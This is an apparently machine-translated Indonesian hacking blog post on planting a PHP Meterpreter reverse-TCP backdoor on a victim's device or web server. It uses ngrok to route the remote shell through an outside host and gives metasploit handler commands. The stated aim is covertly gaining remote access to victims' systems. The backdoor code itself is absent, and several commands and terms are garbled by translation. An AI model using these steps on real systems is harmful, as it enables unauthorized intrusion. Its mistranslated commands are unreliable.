Banyak orang bertanya kepada saya apa keuntungan dari pengkodean manual atau membuat payload untuk metasploit ketika kita dapat membuatnya dengan metasploit?
Jadi mari kita misalkan jika seorang hacker atau penyerang memiliki perangkat korban untuk beberapa waktu dan tidak ada peralatan lain seperti Android. Laptop, dll. untuk menghasilkan backdoor. Jadi dalam hal ini mereka dapat secara manual membuat kode atau membuat pintu belakang di perangkat korban dan kemudian mengeksploitasinya kapan saja dengan metasploit.
Jadi pertama-tama Anda perlu mengatur penerusan porta karena seperti yang kita semua tahu php digunakan dalam aplikasi web sehingga itu keluar dari jaringan area lokal. Kita dapat melakukan port forwarding sementara dengan menggunakan server ngrok atau untuk akses permanen kita dapat menggunakan situs web portmap (Seperti yang telah kami sebutkan di posting kami sebelumnya).
- Ngrok (Penerusan Pelabuhan Sementara)
- Portmap (Penerusan Port Permanen)
Jadi dalam kasus saya, saya akan menunjukkan kepada Anda demo jadi gunakan ngrok untuk penerusan port sementara dan hasilnya dapatkan konfigurasi berikut.
> tcp://0.tcp.ngrok.io:14817 -> localhost:4444
Dalam kasus Anda selalu berbeda.
Jadi saatnya untuk membuat atau mengkode backdoor php (Jika Anda memiliki pengetahuan dasar php maka pekerjaan Anda mudah atau jika Anda tidak memilikinya, cukup tempel kode yang diberikan tetapi ingat untuk menambahkan kode Anda. tuan rumah lokal dan pelabuhan lokal di pintu belakang.
————————————————–( Salin Kode yang Diberikan) ————————————————- —————
/*
————————————————– ————————————————– ———————————-
Sekarang simpan file ini sebagai filename.php. Kamu dapat memakai Ctrl + F untuk menemukan lhost dan lport dalam kode dan kemudian masukkan detail Anda.
Catatan :- Ini penting untuk menambahkan lhost dan lport dalam kode jika tidak, payload tidak merespons
Semuanya selesai sekarang setup eksploitasi di konsol metasploit Anda dengan perintah yang diberikan.
$msfconsole
$ gunakan exploit/multi/penangan
$ mengatur payload php/meterpreter/reverse_tcp
$set lhost 0.0.0.0
$ setel port 4444
$ mengeksploitasi
Sekarang Anda hanya perlu mengunggah file php ini di server web dan kemudian menyegarkan www.example.com/filename.php. Sesi meterpreter Anda berhasil dimulai. gunakan perintah bantuan untuk opsi.
Saya harap informasi ini bermanfaat bagi Anda dan jika Anda menemukan sesuatu yang menarik di situs blog kami, pastikan untuk berlangganan kami untuk pembaruan di masa mendatang dan tetap terhubung di platform media sosial kami yang lain. Terima kasih telah berkunjung semoga harimu menyenangkan.
Mohit Saran (Raja Peretas)